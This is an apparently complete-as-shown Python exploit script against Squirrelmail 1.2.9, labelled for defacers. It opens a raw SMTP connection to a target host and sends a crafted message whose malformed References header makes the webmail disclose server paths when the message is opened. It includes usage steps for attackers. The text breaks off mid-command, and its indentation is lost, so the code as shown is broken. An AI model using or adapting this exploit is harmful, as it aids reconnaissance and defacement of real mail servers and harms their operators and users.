#!/usr/bin/env python
##
# Squirrelmail Path Disclosure Exploit
# F.O.R D.E.F.A.C.E.D O.N.L.Y!!
##
# Tested on: Linux, Apache 1.3.23,
# PHP 4.2.1, Squirrelmail 1.2.9
##
# Usage:
# [1] Change host and mbox vars vith correct
# smtp host and your squirelmail mailbox
# [2] Execute squir.py
# [3] Go to your mailbox and open this msg
##
import socket
from time import sleep
host = '10.0.0.10'
mbox = '[email protected]'
spls = 'References: <20030324135652.Gwtfwtfwftwtf\x0d\x0a'
h = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
h.connect((host, 0x19))
except:
print('socket error')
h.send('helo Im_Squirrelfucker\x0d\x0a')
sleep(2)
h.send('mail from: